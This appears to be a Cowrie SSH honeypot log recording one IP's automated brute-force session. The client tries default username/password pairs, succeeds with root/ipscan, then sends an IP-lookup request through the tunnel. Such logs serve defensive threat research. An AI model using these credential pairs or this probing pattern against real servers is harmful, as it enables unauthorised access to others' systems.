{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:05.891740Z","src_ip":"212.227.235.229","session":"f38cc8704f1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42530,"dst_ip":"1.2.3.4","dst_port":22,"session":"d07276f762ef","protocol":"ssh","message":"New connection: 212.227.235.229:42530 (1.2.3.4:22) [session: d07276f762ef]","sensor":"my-vps","timestamp":"2025-08-28T08:01:06.631304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:06.634770Z","src_ip":"212.227.235.229","session":"d07276f762ef"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:06.910940Z","src_ip":"212.227.235.229","session":"d07276f762ef"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:07.725409Z","src_ip":"212.227.235.229","session":"f38cc8704f1e"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:08.163733Z","src_ip":"212.227.235.229","session":"d07276f762ef"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:09.451572Z","src_ip":"212.227.235.229","session":"d07276f762ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39272,"dst_ip":"1.2.3.4","dst_port":22,"session":"601fef9d18c1","protocol":"ssh","message":"New connection: 212.227.235.229:39272 (1.2.3.4:22) [session: 601fef9d18c1]","sensor":"my-vps","timestamp":"2025-08-28T08:01:11.664884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:12.251497Z","src_ip":"212.227.235.229","session":"601fef9d18c1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:12.504760Z","src_ip":"212.227.235.229","session":"601fef9d18c1"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:01:14.270695Z","src_ip":"212.227.235.229","session":"601fef9d18c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:01:14.528918Z","session":"601fef9d18c1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:01:14.843693Z","src_ip":"212.227.235.229","session":"601fef9d18c1"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:15.100526Z","src_ip":"212.227.235.229","session":"601fef9d18c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39282,"dst_ip":"1.2.3.4","dst_port":22,"session":"6744ba484ce2","protocol":"ssh","message":"New connection: 212.227.235.229:39282 (1.2.3.4:22) [session: 6744ba484ce2]","sensor":"my-vps","timestamp":"2025-08-28T08:01:17.556584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:17.579422Z","src_ip":"212.227.235.229","session":"6744ba484ce2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:17.879416Z","src_ip":"212.227.235.229","session":"6744ba484ce2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:20.525171Z","src_ip":"212.227.235.229","session":"6744ba484ce2"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:21.830076Z","src_ip":"212.227.235.229","session":"6744ba484ce2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40110,"dst_ip":"1.2.3.4","dst_port":22,"session":"221cbcadf4d6","protocol":"ssh","message":"New connection: 212.227.235.229:40110 (1.2.3.4:22) [session: 221cbcadf4d6]","sensor":"my-vps","timestamp":"2025-08-28T08:01:28.021879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:28.114473Z","src_ip":"212.227.235.229","session":"221cbcadf4d6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:28.307645Z","src_ip":"212.227.235.229","session":"221cbcadf4d6"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:29.498298Z","src_ip":"212.227.235.229","session":"221cbcadf4d6"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:32.026337Z","src_ip":"212.227.235.229","session":"221cbcadf4d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51298,"dst_ip":"1.2.3.4","dst_port":22,"session":"2044174261de","protocol":"ssh","message":"New connection: 212.227.235.229:51298 (1.2.3.4:22) [session: 2044174261de]","sensor":"my-vps","timestamp":"2025-08-28T08:01:33.681818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:33.737634Z","src_ip":"212.227.235.229","session":"2044174261de"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:33.929939Z","src_ip":"212.227.235.229","session":"2044174261de"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:35.602207Z","src_ip":"212.227.235.229","session":"2044174261de"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:36.851730Z","src_ip":"212.227.235.229","session":"2044174261de"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:40.946371Z","src_ip":"212.227.235.229","session":"effbb9a75020"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:41.705224Z","src_ip":"212.227.235.229","session":"effbb9a75020"}
{"eventid":"cowrie.session.closed","duration":"112.8","message":"Connection lost after 112.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:42.960816Z","src_ip":"212.227.235.229","session":"effbb9a75020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53858,"dst_ip":"1.2.3.4","dst_port":22,"session":"c20d62e693c4","protocol":"ssh","message":"New connection: 212.227.235.229:53858 (1.2.3.4:22) [session: c20d62e693c4]","sensor":"my-vps","timestamp":"2025-08-28T08:01:44.088584Z"}
